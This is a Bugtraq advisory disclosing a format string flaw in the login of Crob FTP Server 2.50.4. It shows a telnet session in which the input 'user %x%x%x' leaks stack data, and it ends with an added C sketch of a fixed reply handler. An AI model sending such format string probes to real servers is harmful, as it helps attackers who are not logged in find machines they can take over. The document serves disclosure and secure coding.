Bugtraq mailing list archives

Format String Vulnerability in Crob Ftp Server


From: Luca Ercoli <luca.ercoli () inwind it>
Date: 2 Jun 2003 16:55:10 -0000



Package:        Crob Ftp Server
Auth:           Crob Software Studio (www.crob.net/studio/ftpserver/)
Version:        2.50.4 Build 228
Vulnerability:  Format String
Risk:           High


Vulnerability Description:

A format string flaw in the authentication process allows remote attackers 
without valid user/pass to execute arbitrary code.


C:\>telnet 192.168.0.1 21

220- Crob FTP Server V2.50.4
220  Welcome to Crob FTP Server

user %x%x%x

331 Password required for 0d1250b70







Luca Ercoli luca.ercoli[at]inwind.it
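
The session above shows the USER argument being expanded as a format string in the 331 reply. The following C sketch is an added example, not code from the advisory or from Crob Software Studio: the function name build_user_reply, the buffer sizes and the shape of the flawed call are assumptions, since the server's source is not shown. It builds the same reply with the client's bytes passed only as data.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical handler (not the vendor's code): builds the 331 reply for a
 * "USER <name>" command line. Returns the reply length, or -1 if rejected. */
int build_user_reply(const char *line, char *out, size_t outlen)
{
    char name[64];
    size_t n;
    int len;

    if (strncmp(line, "USER ", 5) != 0 && strncmp(line, "user ", 5) != 0)
        return -1;
    line += 5;

    /* Take the argument up to CR/LF; refuse empty or over-long names
     * rather than silently truncating them. */
    n = strcspn(line, "\r\n");
    if (n == 0 || n >= sizeof(name))
        return -1;
    memcpy(name, line, n);
    name[n] = '\0';

    /* Flawed pattern (assumed; consistent with the transcript): the
     * client-supplied name is used as the format argument itself, e.g.
     *
     *     sprintf(msg, name);
     *
     * so "%x" is interpreted instead of echoed. The fix is a constant
     * format string with the name supplied as a %s argument. */
    len = snprintf(out, outlen, "331 Password required for %s\r\n", name);
    if (len < 0 || (size_t)len >= outlen)
        return -1;              /* reply did not fit: fail closed */
    return len;
}

int main(void)
{
    char reply[128];

    /* Constructed input matching the session in the advisory. */
    if (build_user_reply("user %x%x%x\r\n", reply, sizeof(reply)) > 0)
        fputs(reply, stdout);
    return 0;
}
```

Building with -Wformat -Wformat-security (GCC/Clang) flags printf-family calls whose format argument is not a string literal, which is how this class of bug is usually caught before release.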

